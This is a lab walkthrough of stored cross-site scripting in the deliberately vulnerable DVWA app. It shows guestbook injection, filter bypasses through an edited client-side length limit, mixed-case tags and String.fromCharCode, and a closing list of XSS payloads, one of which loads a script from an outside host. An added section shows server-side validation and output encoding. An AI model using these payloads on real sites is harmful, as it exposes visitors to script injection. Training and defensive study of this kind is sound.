Stored XSS in DVWA
Refer to the XSS - Cross Site Scripting guide, where I'm explaining what XSS is and the types of XSS.
The difference between Reflected XSS and Stored XSS is that Stored XSS is, as implied by its name, stored in the site, so anyone who visits the site will see your XSS in their browser.
Power on the Metasploitable machine, and get the machine IP.
In the Kali machine, open a browser and go to the Metasploitable machine's IP.
DVWA >> DVWA Security >> Low >> submit
DVWA >> "XSS stored"
Add your name and a message to see how the website works.
Now if you go to the same URL from a different computer, you will see the same message you typed.
So now, let’s inject the payload from one machine / PC.
Once you visit the same website on a different machine, you will get your XSS message.
Your JavaScript is now stored in the website = stored XSS.
In the second browser you will see:
Next stage is to change the security level to medium.
But before you do that, you need to reset the DB, since you already have a stored XSS in there:
You need to think of another way to bypass the defenses of the website.
How about the "Name" field?
If you try to inject your script to the "Name" field you will see that you can’t set more than 10 characters.
In order to bypass that, go to the source code and change the 10 to 50 or more and then try again, like so:
Change:
Inject:
The result is:
Some websites filter single or double quotes, so we can try to run the payload with character codes, via a website like this
To make sure you bypass any filter, you need to change the "alert" of the script as well:
<Script>alert(String.fromCharCode(120, 115, 115, 50, 10))</ScRIpT>
Now if you visit the website from a different machine, you will see the payload you injected, in our example "xss2".
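Why the steps above work and what stops them, as an added example (not code from this guide or from DVWA): the length limit only exists in the browser and the filter only matches one spelling of the tag, while a server-side length check and output encoding hold up against both. The function names, the 50-character message limit and the model of the filter are assumptions made for this example.

```javascript
// Added example. Function names are hypothetical; this is not DVWA's source.
const MAX_NAME = 10;    // the limit the form's maxlength attribute only suggests
const MAX_MESSAGE = 50; // assumed limit for the message field

// Assumed model of a blacklist filter: removes the exact lowercase tag only.
function weakFilter(input) {
  return input.split('<script>').join('');
}

// Server-side validation: the limit is enforced where the visitor cannot edit it.
function validateEntry(name, message) {
  if (typeof name !== 'string' || typeof message !== 'string') {
    return { ok: false, reason: 'not a string' };
  }
  if (name.length < 1 || name.length > MAX_NAME) {
    return { ok: false, reason: 'name length' };
  }
  if (message.length < 1 || message.length > MAX_MESSAGE) {
    return { ok: false, reason: 'message length' };
  }
  return { ok: true, reason: '' };
}

// Output encoding: HTML metacharacters become entities, so stored text is
// displayed as text however the tag is capitalised or the string is built.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render one guestbook row, encoding both fields at output time.
function renderEntry(entry) {
  return '<div>Name: ' + escapeHtml(entry.name) +
    '<br>Message: ' + escapeHtml(entry.message) + '</div>';
}

// Constructed sample: the mixed-case payload from the walkthrough above.
const sample = '<Script>alert(String.fromCharCode(120, 115, 115, 50, 10))</ScRIpT>';

console.log('blacklist leaves it unchanged:', weakFilter(sample) === sample);
console.log('server-side length check:', validateEntry(sample, 'hi'));
console.log('encoded for display:', renderEntry({ name: sample, message: 'hi' }));
```

Encoding at output time is the control that matters here: the entry can be stored exactly as typed and still reaches every visitor's browser as inert text.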
Hope you find this information useful.
There are many more script injections on the web for you to explore, such as:
<IMG onmouseover="alert('xxs')">
<IMG SRC=# onmouseover="alert('xxs')">
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<BODY BACKGROUND="javascript:alert('XSS')">
All the guides, tips, and tricks on this website are for educational purposes only; the website owner is not accountable for any use of this information.